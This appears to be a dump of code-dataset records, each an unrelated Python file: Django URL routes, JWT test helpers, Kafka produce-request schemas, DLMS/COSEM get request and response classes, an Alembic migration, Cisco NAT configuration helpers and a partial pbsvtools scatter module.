id
stringlengths 2
8
| text
stringlengths 16
264k
| dataset_id
stringclasses 1
value |
---|---|---|
1874352
|
<gh_stars>1-10
from django.urls import path
from administracao.views import (
IndexAdministracaoView,
AdministracaoSearchView,
)
urlpatterns = [
path('', IndexAdministracaoView.as_view(), name='index-administracao'),
path('busca/', AdministracaoSearchView.as_view(), name='busca-ad'),
]
|
StarcoderdataPython
|
398521
|
# Copyright © 2019 Province of British Columbia
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Data for the JWT tokens."""
from typing import List
STAFF_ROLE = 'staff'
def helper_create_jwt(jwt_manager, roles: List[str] = [], username: str = 'test-user'):
"""Create a jwt bearer token with the correct keys, roles and username."""
token_header = {
'alg': 'RS256',
'typ': 'JWT',
'kid': 'flask-jwt-oidc-test-client'
}
claims = {
'iss': 'https://example.localdomain/auth/realms/example',
'sub': '43e6a245-0bf7-4ccf-9bd0-e7fb85fd18cc',
'aud': 'example',
'exp': 2539722391,
'iat': 1539718791,
'jti': 'flask-jwt-oidc-test-support',
'typ': 'Bearer',
'username': f'{username}',
'realm_access': {
'roles': [] + roles
}
}
return jwt_manager.create_jwt(claims, token_header)
def create_header(jwt_manager, roles: List[str] = [], username: str = 'test-user', **kwargs):
"""Return a header containing a JWT bearer token."""
token = helper_create_jwt(jwt_manager, roles=roles, username=username)
headers = {**kwargs, **{'Authorization': 'Bearer ' + token}}
return headers
|
StarcoderdataPython
|
386455
|
<gh_stars>0
from django.urls import path
app_name = "{{django_app_name}}-api"
urlpatterns = [
]
|
StarcoderdataPython
|
4843926
|
# this is not right
# i am not a dictionary
# I am your Brain..
# This is just a random text..
# Don't try to make sense of everything
import this
|
StarcoderdataPython
|
6503560
|
from __future__ import absolute_import
from kafka.protocol.api import Request, Response
from kafka.protocol.types import Int16, Int32, Int64, String, Array, Schema, Bytes
class ProduceResponse_v0(Response):
API_KEY = 0
API_VERSION = 0
SCHEMA = Schema(
('topics', Array(
('topic', String('utf-8')),
('partitions', Array(
('partition', Int32),
('error_code', Int16),
('offset', Int64)))))
)
class ProduceResponse_v1(Response):
API_KEY = 0
API_VERSION = 1
SCHEMA = Schema(
('topics', Array(
('topic', String('utf-8')),
('partitions', Array(
('partition', Int32),
('error_code', Int16),
('offset', Int64))))),
('throttle_time_ms', Int32)
)
class ProduceResponse_v2(Response):
API_KEY = 0
API_VERSION = 2
SCHEMA = Schema(
('topics', Array(
('topic', String('utf-8')),
('partitions', Array(
('partition', Int32),
('error_code', Int16),
('offset', Int64),
('timestamp', Int64))))),
('throttle_time_ms', Int32)
)
class ProduceResponse_v3(Response):
API_KEY = 0
API_VERSION = 3
SCHEMA = ProduceResponse_v2.SCHEMA
class ProduceResponse_v4(Response):
"""
The version number is bumped up to indicate that the client supports KafkaStorageException.
The KafkaStorageException will be translated to NotLeaderForPartitionException in the response if version <= 3
"""
API_KEY = 0
API_VERSION = 4
SCHEMA = ProduceResponse_v3.SCHEMA
class ProduceResponse_v5(Response):
API_KEY = 0
API_VERSION = 5
SCHEMA = Schema(
('topics', Array(
('topic', String('utf-8')),
('partitions', Array(
('partition', Int32),
('error_code', Int16),
('offset', Int64),
('timestamp', Int64),
('log_start_offset', Int64))))),
('throttle_time_ms', Int32)
)
class ProduceRequest(Request):
API_KEY = 0
def expect_response(self):
if self.required_acks == 0: # pylint: disable=no-member
return False
return True
class ProduceRequest_v0(ProduceRequest):
API_VERSION = 0
RESPONSE_TYPE = ProduceResponse_v0
SCHEMA = Schema(
('required_acks', Int16),
('timeout', Int32),
('topics', Array(
('topic', String('utf-8')),
('partitions', Array(
('partition', Int32),
('messages', Bytes)))))
)
class ProduceRequest_v1(ProduceRequest):
API_VERSION = 1
RESPONSE_TYPE = ProduceResponse_v1
SCHEMA = ProduceRequest_v0.SCHEMA
class ProduceRequest_v2(ProduceRequest):
API_VERSION = 2
RESPONSE_TYPE = ProduceResponse_v2
SCHEMA = ProduceRequest_v1.SCHEMA
class ProduceRequest_v3(ProduceRequest):
API_VERSION = 3
RESPONSE_TYPE = ProduceResponse_v3
SCHEMA = Schema(
('transactional_id', String('utf-8')),
('required_acks', Int16),
('timeout', Int32),
('topics', Array(
('topic', String('utf-8')),
('partitions', Array(
('partition', Int32),
('messages', Bytes)))))
)
class ProduceRequest_v4(ProduceRequest):
"""
The version number is bumped up to indicate that the client supports KafkaStorageException.
The KafkaStorageException will be translated to NotLeaderForPartitionException in the response if version <= 3
"""
API_VERSION = 4
RESPONSE_TYPE = ProduceResponse_v4
SCHEMA = ProduceRequest_v3.SCHEMA
class ProduceRequest_v5(ProduceRequest):
"""
Same as v4. The version number is bumped since the v5 response includes an additional
partition level field: the log_start_offset.
"""
API_VERSION = 5
RESPONSE_TYPE = ProduceResponse_v5
SCHEMA = ProduceRequest_v4.SCHEMA
ProduceRequest = [
ProduceRequest_v0, ProduceRequest_v1, ProduceRequest_v2,
ProduceRequest_v3, ProduceRequest_v4, ProduceRequest_v5
]
ProduceResponse = [
ProduceResponse_v0, ProduceResponse_v1, ProduceResponse_v2,
ProduceResponse_v3, ProduceResponse_v4, ProduceResponse_v5
]
|
StarcoderdataPython
|
1694647
|
# Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from webob.headers import ResponseHeaders
from st2common.constants.api import CACHE_CONTROL_HEADER
class CacheMiddleware(object):
def __init__(self, app):
self.app = app
def __call__(self, environ, start_response):
def custom_start_response(status, headers, exc_info=None):
headers = ResponseHeaders(headers)
headers['Cache-Control'] = CACHE_CONTROL_HEADER
return start_response(status, headers._items, exc_info)
return self.app(environ, custom_start_response)
|
StarcoderdataPython
|
3491941
|
from functools import partial
from typing import *
import attr
import dlms_cosem.utils
from dlms_cosem import a_xdr, cosem, dlms_data
from dlms_cosem import enumerations as enums
from dlms_cosem.cosem import selective_access
from dlms_cosem.dlms_data import (
VARIABLE_LENGTH,
AbstractDlmsData,
DlmsDataFactory,
decode_variable_integer,
encode_variable_integer,
)
from dlms_cosem.protocol.xdlms.base import AbstractXDlmsApdu
from dlms_cosem.protocol.xdlms.invoke_id_and_priority import InvokeIdAndPriority
get_request_type_from_bytes = partial(enums.GetRequestType.from_bytes, byteorder="big")
get_response_type_from_bytes = partial(
enums.GetResponseType.from_bytes, byteorder="big"
)
class NullValue:
def __call__(self):
return None
def if_falsy_set_none(value):
if value:
return value
@attr.s(auto_attribs=True)
class GetRequestNormal(AbstractXDlmsApdu):
"""
Represents a Get request.
Get requests are modeled with a choice but we only support the normal one.
Get requests work in single attributes on interface classes.
To get a value you would need the interface class, the instance (OBIS) and the
attribute id.
Some attributes allow for selective access to the attributes. For example a load
profile might be read from a specific date or a specific entry.
"""
TAG: ClassVar[int] = 192
REQUEST_TYPE: ClassVar[enums.GetRequestType] = enums.GetRequestType.NORMAL
cosem_attribute: cosem.CosemAttribute = attr.ib(
validator=attr.validators.instance_of(cosem.CosemAttribute)
)
invoke_id_and_priority: InvokeIdAndPriority = attr.ib(
factory=InvokeIdAndPriority,
validator=attr.validators.instance_of(InvokeIdAndPriority),
)
access_selection: Optional[
Union[selective_access.RangeDescriptor, selective_access.EntryDescriptor]
] = attr.ib(default=None, converter=if_falsy_set_none)
@classmethod
def from_bytes(cls, source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != cls.TAG:
raise ValueError(
f"Tag for GET request is not correct. Got {tag}, should be {cls.TAG}"
)
type_choice = enums.GetRequestType(data.pop(0))
if type_choice is not enums.GetRequestType.NORMAL:
raise ValueError(
"The data for the GetRequest is not for a GetRequestNormal"
)
invoke_id_and_priority = InvokeIdAndPriority.from_bytes(
data.pop(0).to_bytes(1, "big")
)
cosem_attribute_data = data[:9]
cosem_attribute = cosem.CosemAttribute.from_bytes(cosem_attribute_data)
data = data[9:]
has_access_selection = bool(data.pop(0))
if has_access_selection:
access_selection = selective_access.AccessDescriptorFactory.from_bytes(data)
else:
access_selection = None
return cls(
cosem_attribute=cosem_attribute,
invoke_id_and_priority=invoke_id_and_priority,
access_selection=access_selection,
)
def to_bytes(self):
# automatically adding the choice for GetRequestNormal.
out = bytearray()
out.append(self.TAG)
out.append(self.REQUEST_TYPE.value)
out.extend(self.invoke_id_and_priority.to_bytes())
out.extend(self.cosem_attribute.to_bytes())
if self.access_selection:
out.extend(b"\x01")
out.extend(self.access_selection.to_bytes())
else:
out.extend(b"\x00")
return bytes(out)
@attr.s(auto_attribs=True)
class GetRequestNext(AbstractXDlmsApdu):
TAG: ClassVar[int] = 192
REQUEST_TYPE: ClassVar[enums.GetRequestType] = enums.GetRequestType.NEXT
block_number: int = attr.ib(validator=attr.validators.instance_of(int), default=0)
invoke_id_and_priority: InvokeIdAndPriority = attr.ib(
factory=InvokeIdAndPriority,
validator=attr.validators.instance_of(InvokeIdAndPriority),
)
@classmethod
def from_bytes(cls, source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != cls.TAG:
raise ValueError(
f"Tag for GET request is not correct. Got {tag}, should be {cls.TAG}"
)
type_choice = enums.GetRequestType(data.pop(0))
if type_choice is not enums.GetRequestType.NEXT:
raise ValueError("The data for the GetRequest is not for a GetRequestNext")
invoke_id_and_priority = InvokeIdAndPriority.from_bytes(
data.pop(0).to_bytes(1, "big")
)
assert len(data) == 4 # should only be block number left.
block_number = int.from_bytes(data, "big")
return cls(block_number, invoke_id_and_priority)
def to_bytes(self) -> bytes:
out = bytearray()
out.append(self.TAG)
out.append(self.REQUEST_TYPE)
out.extend(self.invoke_id_and_priority.to_bytes())
out.extend(self.block_number.to_bytes(4, "big"))
return bytes(out)
@attr.s(auto_attribs=True)
class GetRequestWithList(AbstractXDlmsApdu):
TAG: ClassVar[int] = 192
REQUEST_TYPE: ClassVar[enums.GetRequestType] = enums.GetRequestType.WITH_LIST
cosem_attributes_with_selection: List[cosem.CosemAttributeWithSelection]
invoke_id_and_priority: InvokeIdAndPriority = attr.ib(
factory=InvokeIdAndPriority,
validator=attr.validators.instance_of(InvokeIdAndPriority),
)
@classmethod
def from_bytes(cls, source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != cls.TAG:
raise ValueError(
f"Tag for GET request is not correct. Got {tag}, should be {cls.TAG}"
)
type_choice = enums.GetRequestType(data.pop(0))
if type_choice is not enums.GetRequestType.WITH_LIST:
raise ValueError(
"The data for the GetRequest is not for a GetRequestWithList"
)
invoke_id_and_priority = InvokeIdAndPriority.from_bytes(
data.pop(0).to_bytes(1, "big")
)
number_of_items = data.pop(0)
cosem_atts = list()
for i in range(0, number_of_items):
# Not really happy with the format of this but it works fine.
c = cosem.CosemAttributeWithSelection.from_bytes(data)
cosem_atts.append(c)
data = data[len(c.to_bytes()) :]
return cls(
cosem_attributes_with_selection=cosem_atts,
invoke_id_and_priority=invoke_id_and_priority,
)
def to_bytes(self) -> bytes:
out = bytearray()
out.append(self.TAG)
out.append(self.REQUEST_TYPE)
out.extend(self.invoke_id_and_priority.to_bytes())
out.extend(
encode_variable_integer(len(self.cosem_attributes_with_selection))
) # number of items
for item in self.cosem_attributes_with_selection:
out.extend(item.to_bytes())
return bytes(out)
@attr.s(auto_attribs=True)
class GetRequestFactory:
"""
The factory will parse the GetRequest and return either a GetRequestNormal,
GetRequestNext or a GetRequestWithList.
"""
TAG: ClassVar[int] = 192
@staticmethod
def from_bytes(source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != GetRequestFactory.TAG:
raise ValueError(
f"Tag for GET request is not correct. Got {tag}, should be "
f"{GetRequestFactory.TAG}"
)
request_type = enums.GetRequestType(data.pop(0))
if request_type == enums.GetRequestType.NORMAL:
return GetRequestNormal.from_bytes(source_bytes)
elif request_type == enums.GetRequestType.NEXT:
return GetRequestNext.from_bytes(source_bytes)
elif request_type == enums.GetRequestType.WITH_LIST:
return GetRequestWithList.from_bytes(source_bytes)
else:
raise ValueError(
f"Received an enum request type that is not valid for "
f"GetRequest: {request_type}"
)
@attr.s(auto_attribs=True)
class GetResponseNormal(AbstractXDlmsApdu):
TAG: ClassVar[int] = 196
RESPONSE_TYPE: ClassVar[enums.GetResponseType] = enums.GetResponseType.NORMAL
data: bytes = attr.ib(validator=attr.validators.instance_of(bytes))
invoke_id_and_priority: InvokeIdAndPriority = attr.ib(
factory=InvokeIdAndPriority,
validator=attr.validators.instance_of(InvokeIdAndPriority),
)
@classmethod
def from_bytes(cls, source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != cls.TAG:
raise ValueError(f"Tag is not correct. Should be {cls.TAG} but is {tag}")
response_type = enums.GetResponseType(data.pop(0))
if response_type != cls.RESPONSE_TYPE:
raise ValueError(
f"The response type byte: {response_type} is not for a GetResponseNormal"
)
invoke_id_and_priority = InvokeIdAndPriority.from_bytes(
data.pop(0).to_bytes(1, "big")
)
choice = data.pop(0)
if choice != 0:
raise ValueError(f"The data choice is not 0 to indicate data but: {choice}")
return cls(bytes(data), invoke_id_and_priority)
def to_bytes(self) -> bytes:
out = bytearray()
out.append(self.TAG)
out.append(self.RESPONSE_TYPE)
out.append(self.invoke_id_and_priority.to_bytes())
out.append(0) # data result choice
out.extend(self.data)
return bytes(out)
@attr.s(auto_attribs=True)
class GetResponseNormalWithError(AbstractXDlmsApdu):
TAG: ClassVar[int] = 196
RESPONSE_TYPE: ClassVar[enums.GetResponseType] = enums.GetResponseType.NORMAL
error: enums.DataAccessResult = attr.ib(
validator=attr.validators.instance_of(enums.DataAccessResult)
)
invoke_id_and_priority: InvokeIdAndPriority = attr.ib(
factory=InvokeIdAndPriority,
validator=attr.validators.instance_of(InvokeIdAndPriority),
)
@classmethod
def from_bytes(cls, source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != cls.TAG:
raise ValueError(f"Tag is not correct. Should be {cls.TAG} but is {tag}")
response_type = enums.GetResponseType(data.pop(0))
if response_type != cls.RESPONSE_TYPE:
raise ValueError(
f"The response type byte: {response_type} is not for a GetResponseNormal"
)
invoke_id_and_priority = InvokeIdAndPriority.from_bytes(
data.pop(0).to_bytes(1, "big")
)
choice = data.pop(0)
if choice != 1:
raise ValueError(
f"The data choice is not 1 to indicate error but: {choice}"
)
error = enums.DataAccessResult(data.pop(0))
return cls(error, invoke_id_and_priority)
def to_bytes(self) -> bytes:
out = bytearray()
out.append(self.TAG)
out.append(self.RESPONSE_TYPE)
out.extend(self.invoke_id_and_priority.to_bytes())
out.append(1) # data error choice
out.extend(self.error.to_bytes(1, "big"))
return bytes(out)
@attr.s(auto_attribs=True)
class GetResponseWithBlock(AbstractXDlmsApdu):
"""
The data sent in a block response is an OCTET STRING. Not instance of DLMS Data.
So it has the length encoding first.
"""
TAG: ClassVar[int] = 196
RESPONSE_TYPE: ClassVar[enums.GetResponseType] = enums.GetResponseType.WITH_BLOCK
data: bytes = attr.ib(validator=attr.validators.instance_of(bytes))
block_number: int = attr.ib(validator=attr.validators.instance_of(int), default=0)
invoke_id_and_priority: InvokeIdAndPriority = attr.ib(
factory=InvokeIdAndPriority,
validator=attr.validators.instance_of(InvokeIdAndPriority),
)
@classmethod
def from_bytes(cls, source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != cls.TAG:
raise ValueError(f"Tag is not correct. Should be {cls.TAG} but is {tag}")
response_type = enums.GetResponseType(data.pop(0))
if response_type != cls.RESPONSE_TYPE:
raise ValueError(
f"The response type byte: {response_type} is not for a GetResponseNormal"
)
invoke_id_and_priority = InvokeIdAndPriority.from_bytes(
data.pop(0).to_bytes(1, "big")
)
last_block = bool(data.pop(0))
if last_block:
raise ValueError(
f"Last block set to true in a GetResponseWithBlock. Should only be set "
f"for a GetResponseLastBlock"
)
block_number = int.from_bytes(data[:4], "big")
data = data[4:]
choice = data.pop(0)
if choice != 0:
raise ValueError(f"The data choice is not 0 to indicate data but: {choice}")
data_length, data = dlms_cosem.dlms_data.decode_variable_integer(data)
if data_length != len(data):
raise ValueError(
"The octet string in block data is not of the correct length"
)
return cls(bytes(data), block_number, invoke_id_and_priority)
def to_bytes(self) -> bytes:
out = bytearray()
out.append(self.TAG)
out.append(self.RESPONSE_TYPE)
out.extend(self.invoke_id_and_priority.to_bytes())
out.append(0) # last block == False
out.extend(self.block_number.to_bytes(4, "big"))
out.append(0) # data choice = data
out.extend(
dlms_cosem.dlms_data.encode_variable_integer(len(self.data))
) # octet string length
out.extend(self.data)
return bytes(out)
@attr.s(auto_attribs=True)
class GetResponseLastBlock(AbstractXDlmsApdu):
TAG: ClassVar[int] = 196
RESPONSE_TYPE: ClassVar[enums.GetResponseType] = enums.GetResponseType.WITH_BLOCK
data: bytes = attr.ib(validator=attr.validators.instance_of(bytes))
block_number: int = attr.ib(validator=attr.validators.instance_of(int), default=0)
invoke_id_and_priority: InvokeIdAndPriority = attr.ib(
factory=InvokeIdAndPriority,
validator=attr.validators.instance_of(InvokeIdAndPriority),
)
@classmethod
def from_bytes(cls, source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != cls.TAG:
raise ValueError(f"Tag is not correct. Should be {cls.TAG} but is {tag}")
response_type = enums.GetResponseType(data.pop(0))
if response_type != cls.RESPONSE_TYPE:
raise ValueError(
f"The response type byte: {response_type} is not for a GetResponseNormal"
)
invoke_id_and_priority = InvokeIdAndPriority.from_bytes(
data.pop(0).to_bytes(1, "big")
)
last_block = bool(data.pop(0))
if not last_block:
raise ValueError(
f"Last block is not set to true in a GetResponseLastBlock."
)
block_number = int.from_bytes(data[:4], "big")
data = data[4:]
choice = data.pop(0)
if choice != 0:
raise ValueError(f"The data choice is not 0 to indicate data but: {choice}")
data_length, data = dlms_cosem.dlms_data.decode_variable_integer(data)
if data_length != len(data):
raise ValueError(
"The octet string in block data is not of the correct length"
)
return cls(bytes(data), block_number, invoke_id_and_priority)
def to_bytes(self) -> bytes:
out = bytearray()
out.append(self.TAG)
out.append(self.RESPONSE_TYPE)
out.extend(self.invoke_id_and_priority.to_bytes())
out.append(1) # last block == True
out.extend(self.block_number.to_bytes(4, "big"))
out.append(0) # data choice = data
out.extend(
dlms_cosem.dlms_data.encode_variable_integer(len(self.data))
) # octet string length
out.extend(self.data)
return bytes(out)
@attr.s(auto_attribs=True)
class GetResponseLastBlockWithError(AbstractXDlmsApdu):
TAG: ClassVar[int] = 196
RESPONSE_TYPE: ClassVar[enums.GetResponseType] = enums.GetResponseType.WITH_BLOCK
error: enums.DataAccessResult = attr.ib(
validator=attr.validators.instance_of(enums.DataAccessResult)
)
block_number: int = attr.ib(validator=attr.validators.instance_of(int), default=0)
invoke_id_and_priority: InvokeIdAndPriority = attr.ib(
factory=InvokeIdAndPriority,
validator=attr.validators.instance_of(InvokeIdAndPriority),
)
@classmethod
def from_bytes(cls, source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != cls.TAG:
raise ValueError(f"Tag is not correct. Should be {cls.TAG} but is {tag}")
response_type = enums.GetResponseType(data.pop(0))
if response_type != cls.RESPONSE_TYPE:
raise ValueError(
f"The response type byte: {response_type} is not for a GetResponseNormal"
)
invoke_id_and_priority = InvokeIdAndPriority.from_bytes(
data.pop(0).to_bytes(1, "big")
)
last_block = bool(data.pop(0))
if not last_block:
raise ValueError(
f"Last block is not set to true in a GetResponseLastBlock."
)
block_number = int.from_bytes(data[:4], "big")
data = data[4:]
choice = data.pop(0)
if choice != 1:
raise ValueError(
f"The data choice is not 1 to indicate error but: {choice}"
)
assert len(data) == 1
error = enums.DataAccessResult(data.pop(0))
return cls(error, block_number, invoke_id_and_priority)
def to_bytes(self) -> bytes:
out = bytearray()
out.append(self.TAG)
out.append(self.RESPONSE_TYPE)
out.extend(self.invoke_id_and_priority.to_bytes())
out.append(1) # last block == True
out.extend(self.block_number.to_bytes(4, "big"))
out.append(1) # data choice = error
out.extend(self.error.to_bytes(1, "big"))
return bytes(out)
@attr.s(auto_attribs=True)
class GetResponseWithList(AbstractXDlmsApdu):
TAG: ClassVar[int] = 196
RESPONSE_TYPE: ClassVar[enums.GetResponseType] = enums.GetResponseType.WITH_LIST
response_data: List[Union[AbstractDlmsData, enums.DataAccessResult]] = attr.ib(
factory=list
)
invoke_id_and_priority: InvokeIdAndPriority = attr.ib(
factory=InvokeIdAndPriority,
validator=attr.validators.instance_of(InvokeIdAndPriority),
)
@staticmethod
def parse_list_response(source_bytes: bytes, amount: int):
data = bytearray(source_bytes)
dlms_data_items = list()
for index in range(0, amount):
answer_selection = data.pop(0)
if answer_selection == 0:
# DLMS data
parser = dlms_data.DlmsDataParser()
obj = parser.parse(data, limit=1)
rest = parser.get_buffer_tail()
dlms_data_items.append(obj[0])
data = rest
elif answer_selection == 1:
# Data Access Result
dlms_data_items.append(enums.DataAccessResult(data.pop(0)))
else:
raise ValueError("Not a valid answer selection byte")
return dlms_data_items
@property
def result(self) -> List[Any]:
"""
Converts the response data to python objects if possible
"""
out = list()
for item in self.response_data:
if isinstance(item, enums.DataAccessResult):
out.append(item)
else:
out.append(item.to_python())
return out
@classmethod
def from_bytes(cls, source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != cls.TAG:
raise ValueError("Not a GetResponse APDU")
response_type = data.pop(0)
if response_type != cls.RESPONSE_TYPE:
raise ValueError("Not a GetResponseWithList Apdu")
invoke_id_and_priority = InvokeIdAndPriority.from_bytes(
data.pop(0).to_bytes(1, "big")
)
# List of Get-Data-Response.
list_length = data.pop(0)
dlms_data = cls.parse_list_response(data, list_length)
return cls(
invoke_id_and_priority=invoke_id_and_priority, response_data=dlms_data
)
def to_bytes(self) -> bytes:
out = bytearray()
out.append(self.TAG)
out.append(self.RESPONSE_TYPE)
out.extend(self.invoke_id_and_priority.to_bytes())
out.extend(encode_variable_integer(len(self.response_data)))
for item in self.response_data:
if isinstance(item, AbstractDlmsData):
out.append(0)
out.extend(item.to_bytes())
elif isinstance(item, enums.DataAccessResult):
out.append(1)
out.append(item.value)
else:
raise ValueError(
f"unknown data in response for GetResponseWithList: {item}"
)
return bytes(out)
@attr.s(auto_attribs=True)
class GetResponseFactory:
TAG: ClassVar[int] = 196
@staticmethod
def from_bytes(source_bytes: bytes):
data = bytearray(source_bytes)
tag = data.pop(0)
if tag != GetResponseFactory.TAG:
raise ValueError(
f"Tag is not correct. Should be {GetResponseFactory.TAG} but is {tag}"
)
response_type = enums.GetResponseType(data.pop(0))
invoke_id_and_priority = InvokeIdAndPriority.from_bytes(
data.pop(0).to_bytes(1, "big")
)
if response_type == enums.GetResponseType.NORMAL:
# check if it is an error or data response by assesing the choice.
choice = data.pop(0)
if choice == 0:
return GetResponseNormal(
invoke_id_and_priority=invoke_id_and_priority, data=bytes(data)
)
elif choice == 1:
assert len(data) == 1 # should only be one byte left.
error = enums.DataAccessResult(data.pop(0))
return GetResponseNormalWithError(
invoke_id_and_priority=invoke_id_and_priority, error=error
)
elif response_type == enums.GetResponseType.WITH_BLOCK:
last_block = bool(data.pop(0))
block_number = int.from_bytes(data[:4], "big")
data = data[4:]
choice = data.pop(0)
if choice == 0:
data_length, data = dlms_cosem.dlms_data.decode_variable_integer(data)
if data_length != len(data):
raise ValueError(
"The octet string in block data is not of the correct length"
)
if last_block:
return GetResponseLastBlock(
bytes(data), block_number, invoke_id_and_priority
)
else:
return GetResponseWithBlock(
bytes(data), block_number, invoke_id_and_priority
)
elif choice == 1:
assert len(data) == 1 # should only be one byte left.
error = enums.DataAccessResult(data.pop(0))
if last_block:
return GetResponseLastBlockWithError(
error, block_number, invoke_id_and_priority
)
else:
raise ValueError(
"It is not possible to send an error on a "
"GetResponseWithBlock. When an error occurs it "
"should always be sent in a GetResponseLastBlockWithError"
)
elif response_type == enums.GetResponseType.WITH_LIST:
return GetResponseWithList.from_bytes(bytes(source_bytes))
else:
raise ValueError("Response type is not a valid GetResponse type")
|
StarcoderdataPython
|
6613473
|
# -*- coding: utf-8 -*-
import abc
import torch.nn as nn
from DLtorch.base import BaseComponent
import DLtorch.utils.torch_utils as torch_utils
class BaseModel(BaseComponent):
def __init__(self):
super(BaseModel, self).__init__()
self.logger.info("Module Constructed.")
self.logger.info("Parameters: {:.5f}M".format(torch_utils.get_params(self, only_trainable=False) / 1.e6))
|
StarcoderdataPython
|
4950912
|
<filename>CommonTools/ParticleFlow/python/Isolation/pfElectronIsolation_cff.py
import FWCore.ParameterSet.Config as cms
from RecoParticleFlow.PFProducer.electronPFIsolationDeposits_cff import *
from RecoParticleFlow.PFProducer.electronPFIsolationValues_cff import *
pfElectronIsolationTask = cms.Task(
electronPFIsolationDepositsTask ,
electronPFIsolationValuesTask
)
pfElectronIsolationSequence = cms.Sequence(pfElectronIsolationTask)
|
StarcoderdataPython
|
11329958
|
"""empty message
Revision ID: <KEY>
Revises: <PASSWORD>
Create Date: 2017-09-23 21:30:06.863897
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '<KEY>'
down_revision = '<PASSWORD>'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('users', sa.Column('dish_url', sa.String(length=255), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('users', 'dish_url')
# ### end Alembic commands ###
|
StarcoderdataPython
|
9763216
|
"""Common configure functions for nat"""
# Python
import logging
# Unicon
from unicon.core.errors import SubCommandFailure
log = logging.getLogger(__name__)
def configure_nat_in_out(
device,
inside_interface=None,
outside_interface=None,
):
""" Enable nat IN and OUT over interface
Args:
device ('obj'): device to use
inside_interface ('str'): enable nat in over this interface, default value is None
outside_interface ('str'): enable nat out over this interface, default value is None
Returns:
console output
Raises:
SubCommandFailure: NAT IN OUT not enable over interface
"""
cmd = []
if inside_interface:
cmd.append("interface {}".format(inside_interface))
cmd.append("ip nat inside")
if outside_interface:
cmd.append("interface {}".format(outside_interface))
cmd.append("ip nat outside")
try:
out = device.configure(cmd)
except SubCommandFailure as e:
raise SubCommandFailure(
"Could not Enable NAT. Error:\n{error}".format(error=e)
)
return out
def configure_nat_overload_rule(
device,
interface,
access_list_name,
):
""" Configure interface overloaad rule
Args:
device ('obj'): device to use
interface ('str'): Interface which will use for overlad rule
access_list_name ('str'): Name of extended access list
Returns:
console output
Raises:
SubCommandFailure: Nat overload rule not connfigured
"""
cmd = ["ip nat inside source list {} interface {} overload".format(access_list_name,interface)]
try:
out = device.configure(cmd)
except SubCommandFailure as e:
raise SubCommandFailure(
"Could not Configure NAT overload rule. Error:\n{error}".format(error=e)
)
return out
def unconfigure_nat_in_out(
device,
inside_interface=None,
outside_interface=None,
):
""" Disable nat IN and OUT over interface
Args:
device ('obj'): device to use
inside_interface ('str'): Disable nat in from this interface, default value is None
outside_interface ('str'): Disable nat out From this interface, default value is None
Returns:
console output
Raises:
SubCommandFailure: NAT IN OUT not enable over interface
"""
cmd = []
if inside_interface:
cmd.append("interface {}".format(inside_interface))
cmd.append("no ip nat inside")
if outside_interface:
cmd.append("interface {}".format(outside_interface))
cmd.append("no ip nat outside")
try:
out = device.configure(cmd)
except SubCommandFailure as e:
raise SubCommandFailure(
"Could not Disable NAT. Error:\n{error}".format(error=e)
)
return out
def unconfigure_nat_overload_rule(
device,
interface,
access_list_name,
):
""" UnConfigure interface overload rule
Args:
device ('obj'): device to use
interface ('str'): Interface which will use for overlad rule
access_list_name ('str'): Name of extended access list
Returns:
console output
Raises:
SubCommandFailure: Nat overload rule not unconfigured
"""
cmd = ["no ip nat inside source list {} interface {} overload".format(access_list_name, interface)]
try:
out = device.configure(cmd)
except SubCommandFailure as e:
raise SubCommandFailure(
"Could not UnConfigure NAT overload rule. Error:\n{error}".format(error=e)
)
return out
|
StarcoderdataPython
|
1791238
|
<filename>SLpackage/private/pacbio/pythonpkgs/pbsvtools/lib/python2.7/site-packages/pbsvtools/tasks/scatter_align_json_to_svsig.py
#! python
"""
Scatter inputs of pbsvtools.tasks.align_json_to_svsig
align takes two inputs:
Input: idx 0 - datastore.json containing a list of AlignmentSet files,
or a list of ConsensusAlignmentSet files.
idx 1 - TRF bed file
Output: idx 0 - FOFN of svsig.gz files
"""
from __future__ import absolute_import
import logging
import sys
import math
import os.path as op
from pbcommand.pb_io import write_pipeline_chunks
from pbcommand.models import FileTypes, PipelineChunk
from pbcoretools.datastore_utils import dataset_to_datastore, datastore_to_datastorefile_objs
from .align_json_to_svsig import Constants as BC
from .scatter_call import put_items_to_boxes
from ..basic import scatter_main, TCP_INPUT, TCP_OUTPUT, BaseScatterConstants
log = logging.getLogger(__name__)
class Constants(BaseScatterConstants):
"""Constants must be identical to align_json_to_svsig
Input: idx 0 - DataStore json of AlignmentSet (or ConsensusAlignmentSet)
idx 1 - TRF BED
Output: idx 0 - FOFN of svsig.gz
"""
TOOL_NAME = 'scatter_{}'.format(BC.TOOL_NAME)
DESCRIPTION = "Scatter inputs for pbsvtools.tasks.{}".format(TOOL_NAME)
